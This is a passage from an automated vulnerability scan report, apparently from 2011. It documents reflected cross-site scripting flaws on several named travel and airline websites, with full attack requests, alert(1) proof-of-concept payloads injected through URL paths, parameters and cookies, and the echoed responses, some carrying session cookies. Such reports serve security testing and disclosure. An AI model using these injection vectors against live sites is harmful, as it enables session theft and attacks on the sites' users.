This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /no/package_tourscda4a"><script>alert(1)</script>316ba34c109 HTTP/1.1
Host: www.reisefeber.no
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 13:49:28 GMT
Server: tn6 Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27017

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- template = error/page_has_expired.html -->
<html>
<head>
<title>Reisefeber - Gode reisetilbud er ferskvare</title>
<META http-e
...[SNIP]...
<input type="hidden" name="last_name" value="/no/package_tourscda4a"><script>alert(1)</script>316ba34c109">
...[SNIP]...

1.117. http://www.travel-ticker.com/category.jsp [categoryName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travel-ticker.com
Path:   /category.jsp

Issue detail

The value of the categoryName request parameter is copied into the HTML document as plain text between tags. The payload b57ab<img%20src%3da%20onerror%3dalert(1)>312e3bb0904 was submitted in the categoryName parameter. This input was echoed as b57ab<img src=a onerror=alert(1)>312e3bb0904 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /category.jsp?actionType=1&categoryType=Type&categoryName=Packagesb57ab<img%20src%3da%20onerror%3dalert(1)>312e3bb0904&sid=S287&bid=B312628 HTTP/1.1
Host: www.travel-ticker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DC9547F3C6C155664A59384025CFE96A; Path=/
Set-Cookie: SaneID=DC9547F3C6C155664A59384025CFE96; Expires=Mon, 17-Oct-2016 13:48:43 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi7ltrG1IPXfIeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLVq8LlP5r5sVC9LqYt6r1WejbBqGtX4/QeMydTsx5XDmME0qOPB8zW5aGoplccEyUVyAQw1zoB77fdKkw2wifeN3QXc3uxCTtpmp1Xbz0DxcS4cKS1iGZ7tDS9ulFNeBvx/qJTKhJwy7rJEih5XSyT1Fco8d5rZFOYJfrLMMzpj5kMJEILR9qBNRDl+42pRMtKzavwDRm7Zn4S+YVpyXk9PjDFsc8boH4pNL/i/1SO3SnXZq06Bmb1cMu94wvBIzddV6cWSVnTSkb6zEWjyhKcj/R/L14UAfRNxKLA1dwarM4dx9zfvTJdnTQ5OD8cXu1QsRQx6bhBdHgkaVvI7Yv0CzgZubBDGYZ2py/gVN6nUboAKdWWhnH1+SCb4zGbUyOIkF4m3Q5L+mHwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx75u8crr6cftWqHj6w1ad2e3Pf5CFEtJtPeidw2FziNaUnrZUO8Dg4khW7hU9cY7J7fKZ4GRKCUFiaqRBwocDhg2nL+BU3qdRuu3nLjE0iKGkecN3QDSwuy2hpe08Csu2fupUbvdFv0Cs+iPYTYOKXR36I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR36I9hNg4pdHZkXMwFjN5//GfFEXccZLnT6I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR3vJIAux5tGnqtBrekfKyoe+iPYTYOKXR1PInMvNwnP4qWAQ5Fqf/sURmHo2YOoPtSM+3JgIIVvgfoj2E2Dil0dfPSXg9UVFkdonRAnD1CzZSScdfGLoqChRdyjkfXmqOcml0c5X6k8GJajsUKRNqS+Ouz/Wdyu4Bp8OWBhbicf4Q==; Expires=Mon, 12-Nov-2012 13:48:43 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sun, 13 Nov 2011 13:48:42 GMT
Set-Cookie: NSC_xxx.usbwfm-ujdlfs-iuuq=ffffffffaf131c7945525d5f4f58455e445a4a422d51;path=/;httponly
Content-Length: 353976

<!DOCTYPE html>


<html>
<head>


<title>Travel Ticker</title>

<link rel="shortcut icon" href="http://ak-static.travel-ticker.com/static/images/favicon.ico?ver=2076
...[SNIP]...
<p>Packagesb57ab<img src=a onerror=alert(1)>312e3bb0904 travel deals handpicked for you</p>
...[SNIP]...

1.118. http://travel.travelocity.com/trips/SelectHotel.do [tyrg1st cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /trips/SelectHotel.do

Issue detail

The value of the tyrg1st cookie is copied into an HTML comment. The payload aebba--><script>alert(1)</script>56a708050fc was submitted in the tyrg1st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /trips/SelectHotel.do;jsessionid=6BCDBF9222795F098DDE19F1029B74A0.p0618?travelPackageId=-969765922&SEQ=132119068635410132011&sessionResponseType=hotelShopResponse HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/trips/ViewHotelDetail.do;jsessionid=6BCDBF9222795F098DDE19F1029B74A0.p0618?SEQ=&propertyId=103814&travelPackageId=-969765922&tab=ttrooms&updateSuitcase=false&loclink=VAC_SELECTHOTEL1%7CNAT1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=333E8418B772166Caebba--><script>alert(1)</script>56a708050fc; TUID=29a03bfd-dd1b-4415-9627-a1b0de2d2894; pcookie=n; mt.ti=%7B%22dest%22:%22MIA%22,%22tripDays%22:2%7D; drft=d61d21b6-f8ce-487e-8270-1a087fd74f65; SID=T0042004706111113072154205152534750467; Service=TRAVELOCITY; IPE910=IPE910; JSID=6BCDBF9222795F098DDE19F1029B74A0.p0618; fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; bvgacefAskAndAnswer=true; bvgacefStories=true; mbox=PC#1320962010545-896769.19#1322400373|session#1321190517139-98622#1321192633|check#true#1321190833; __utma=1.543267917.1320962024.1321051917.1321190526.3; __utmb=1.7.8.1321190709439; __utmc=1; __utmz=1.1321190526.3.3.utmcsr=bing.com|utmccn=(referral)|utmcmd=referral|utmcct=/travel/; mt.v=1.1040137567.1320962024293; IPE_S_TMP_910=910

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:33:19 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 184984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/html">
<!--
JSESSIONID = 6BCDBF9222795F098DDE19F1029B74A0.p0618
TPSESSIONID = T0042004706111113072154205152534750467
Service = TRAVELOCITY
TYRG1ST = 333E8418B772166Caebba--><script>alert(1)</script>56a708050fc
-->
...[SNIP]...

1.119. https://www.aa.com/homePage.do [JSESSIONID cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.aa.com
Path:   /homePage.do

Issue detail

The value of the JSESSIONID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 714e0'-alert(1)-'0522951330f was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /homePage.do HTTP/1.1
Host: www.aa.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.aa.com/reservation/enterPassengerDetailsSubmit.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65714e0'-alert(1)-'0522951330f; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Length: 164422
Date: Sun, 13 Nov 2011 13:33:53 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0000V4y_Q0L-O-PnA6hLYbAOhdK:15lkmm2i0; Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lan
...[SNIP]...
<script type="text/javascript">
   
   
                   custom_var='0|0|0|en_US|00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65714e0'-alert(1)-'0522951330f';
   
   
   _ht='http://www.aa.com/index.jsp/US';    
   </script>
...[SNIP]...

Report generated by XSS.CX at Sun Nov 13 09:08:19 CST 2011.